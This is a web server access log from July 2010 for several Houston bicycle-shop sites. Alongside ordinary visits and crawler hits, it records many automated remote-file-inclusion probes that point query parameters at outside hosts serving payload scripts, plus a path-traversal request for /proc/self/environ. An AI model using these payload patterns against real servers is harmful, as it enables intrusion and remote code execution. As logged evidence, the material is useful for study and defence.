174.133.253.139 - - [13/Jul/2010:11:26:24 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:26:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:26:27 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:26:29 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:26:30 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:43:30 -0700] "GET /ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:43:30 -0700] "GET /logs//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
216.17.105.143 - - [13/Jul/2010:11:43:30 -0700] "GET /logs/access.log//ask_password.php?dir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:45 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:46 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:46 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:44:46 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:09 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:09 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:10 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:12 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:12 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:45:12 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:48:54 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:48:54 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.133.253.139 - - [13/Jul/2010:11:48:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://demo.oss.org.cn/e107-0720/e107_files/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:12:30:51 -0700] "GET /logs//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:12:30:55 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
212.174.28.46 - - [13/Jul/2010:12:55:26 -0700] "GET /logs/access_100510.log//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
212.174.28.46 - - [13/Jul/2010:12:55:26 -0700] "GET /include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
212.174.28.46 - - [13/Jul/2010:12:55:36 -0700] "GET /logs//include/write.php?dir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.250.252.242 - - [13/Jul/2010:13:35:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
67.195.114.243 - - [13/Jul/2010:13:40:02 -0700] "GET /Employeesite/ HTTP/1.0" 401 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:33 -0700] "GET /index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:34 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:34 -0700] "GET /logs//index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:38 -0700] "GET /index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:39 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.118.239 - - [13/Jul/2010:13:44:39 -0700] "GET /logs//index.php?option=com_sef&controller=http://arganavontuur.nl/AinuLid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
189.126.107.118 - - [13/Jul/2010:13:49:36 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "houstonbikeshop.com"
189.126.107.118 - - [13/Jul/2010:13:49:37 -0700] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "houstonbikeshop.com"
98.195.164.4 - - [13/Jul/2010:14:04:07 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/Dealerlocator?s_loc=gbr&s_language=eng" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322)" "www.svbikes.com"
98.195.164.4 - - [13/Jul/2010:14:04:08 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322)" "www.svbikes.com"
98.195.164.4 - - [13/Jul/2010:14:04:30 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322)" "www.svbikes.com"
98.195.164.4 - - [13/Jul/2010:14:06:01 -0700] "GET / HTTP/1.1" 200 1764 "http://www.cannondale.com/Dealerlocator?s_loc=gbr&s_language=eng" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322)" "www.svbikes.com"
91.214.44.59 - - [13/Jul/2010:14:21:22 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "houstonbikeshop.com"
67.195.112.217 - - [13/Jul/2010:14:23:47 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [13/Jul/2010:14:23:48 -0700] "GET /bullitinboard/viewtopic.php?p=15890 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
158.35.225.230 - - [13/Jul/2010:14:32:46 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.fisherbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.svbikes.com"
158.35.225.230 - - [13/Jul/2010:14:32:51 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.svbikes.com"
178.154.163.29 - - [13/Jul/2010:14:48:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:15:26:19 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:15:26:19 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:15:26:19 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:15:26:38 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:15:26:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:15:26:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
87.250.252.242 - - [13/Jul/2010:15:28:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
67.195.115.87 - - [13/Jul/2010:15:28:26 -0700] "GET /?S=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
89.108.64.192 - - [13/Jul/2010:15:28:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
69.68.113.128 - - [13/Jul/2010:15:34:09 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; CENTURYLINKIE8)" "www.svbikes.com"
69.68.113.128 - - [13/Jul/2010:15:34:12 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; CENTURYLINKIE8)" "www.svbikes.com"
69.68.113.128 - - [13/Jul/2010:15:35:04 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; CENTURYLINKIE8)" "www.svbikes.com"
69.68.113.128 - - [13/Jul/2010:15:35:04 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; CENTURYLINKIE8)" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:15:37:50 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:15:37:50 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
193.47.80.45 - - [13/Jul/2010:15:42:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [13/Jul/2010:15:42:06 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
113.30.66.24 - - [13/Jul/2010:15:55:25 -0700] "GET /?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:15:55:25 -0700] "GET /logs/access.log/?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
113.30.66.24 - - [13/Jul/2010:15:55:25 -0700] "GET /logs/?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 2940 "-" "Mozilla/5.0" "houstonbikeshop.com"
212.95.63.40 - - [13/Jul/2010:16:41:49 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 1835008 "http://pharmacyon.host-sc.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)" "svbikes.com"
87.250.252.242 - - [13/Jul/2010:16:48:58 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
97.74.73.112 - - [13/Jul/2010:16:55:34 -0700] "GET /logs/access.log HTTP/1.0" 200 513802 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "houstonbikeshop.com"
69.58.178.33 - - [13/Jul/2010:16:55:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:51 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:53 -0700] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:54 -0700] "GET /?N=D HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:55 -0700] "GET /?M=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:56 -0700] "GET /?S=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:57 -0700] "GET /?D=A HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:55:58 -0700] "GET /Employeesite/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:00 -0700] "GET /bullitinboard/ HTTP/1.1" 200 533 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:02 -0700] "GET /fit.html HTTP/1.1" 200 17443 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:03 -0700] "GET /aboutus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:04 -0700] "GET /contactus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:05 -0700] "GET /services.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:06 -0700] "GET /logs/ HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:07 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
69.58.178.33 - - [13/Jul/2010:16:56:08 -0700] "GET /tmp/ HTTP/1.1" 200 659 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:17:13:33 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:17:13:33 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
81.21.78.22 - - [13/Jul/2010:17:13:34 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
87.250.252.242 - - [13/Jul/2010:17:37:26 -0700] "GET /translations/Chinese-GB2312.txt HTTP/1.1" 200 26834 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
178.154.163.29 - - [13/Jul/2010:17:45:28 -0700] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
87.250.252.242 - - [13/Jul/2010:18:13:23 -0700] "GET /contactus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
91.201.66.34 - - [13/Jul/2010:18:18:34 -0700] "GET /logs/access.log HTTP/1.0" 200 518804 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "houstonbikeshop.com"
67.195.37.172 - - [13/Jul/2010:18:19:10 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
67.195.37.172 - - [13/Jul/2010:18:19:12 -0700] "GET /bullitinboard/viewtopic.php?p=3019 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
64.22.67.47 - - [13/Jul/2010:18:24:03 -0700] "GET /logs/access_100510.log/search/?include_dir=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
64.22.67.47 - - [13/Jul/2010:18:24:03 -0700] "GET /logs/search/?include_dir=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
64.22.67.47 - - [13/Jul/2010:18:24:03 -0700] "GET /search/?include_dir=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
208.80.193.27 - - [13/Jul/2010:18:46:52 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0; USDR6)" "bicyclestoreshouston.com"
87.250.252.242 - - [13/Jul/2010:18:49:29 -0700] "GET /logs/access.log HTTP/1.1" 200 520171 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:08:38 -0700] "GET /include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:08:38 -0700] "GET /logs//include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:08:38 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:11:17 -0700] "GET /logs//include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:11:17 -0700] "GET /include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [13/Jul/2010:19:11:45 -0700] "GET /logs/access.log%20%20//include/write.php?dir=http://devilbat.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.31.203.62 - - [13/Jul/2010:19:11:58 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 (.NET CLR 3.5.30729)" "www.svbikes.com"
76.31.203.62 - - [13/Jul/2010:19:11:59 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 (.NET CLR 3.5.30729)" "www.svbikes.com"
76.31.203.62 - - [13/Jul/2010:19:12:02 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 (.NET CLR 3.5.30729)" "www.svbikes.com"
64.207.204.37 - - [13/Jul/2010:19:22:51 -0700] "GET /?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
64.207.204.37 - - [13/Jul/2010:19:22:53 -0700] "GET /?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.79" "houstonbikeshop.com"
81.21.78.22 - - [13/Jul/2010:19:24:22 -0700] "GET /?reflect_base=http://extreme.dars-ip.ru/torrent/id.txt? HTTP/1.1" 200 1764 "-" "libwww-perl/5.803" "houstonbikeshop.com"
87.250.252.242 - - [13/Jul/2010:19:27:24 -0700] "GET /blog/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
